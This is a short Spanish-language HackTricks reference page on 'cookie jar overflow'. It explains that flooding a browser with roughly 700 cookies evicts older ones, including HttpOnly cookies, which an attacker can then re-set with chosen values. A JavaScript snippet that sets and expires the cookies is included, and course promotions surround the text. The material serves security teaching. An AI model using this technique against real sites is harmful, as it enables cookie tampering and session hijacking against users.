Cookie Jar Overflow

Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

Los navegadores tienen un límite en la cantidad de cookies que pueden almacenar para una página. Entonces, si por alguna razón necesitas hacer que una cookie desaparezca, puedes desbordar el tarro de cookies ya que las más antiguas se eliminarán antes:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Ten en cuenta que las cookies de terceros que apunten a un dominio diferente no serán sobrescritas.

Este ataque también se puede utilizar para sobrescribir cookies HttpOnly, ya que puedes eliminarlas y luego restablecerlas con el valor que desees.

Consulta esto en esta publicación con un laboratorio.

Aprende hacking en AWS desde cero hasta convertirte en un experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Última actualización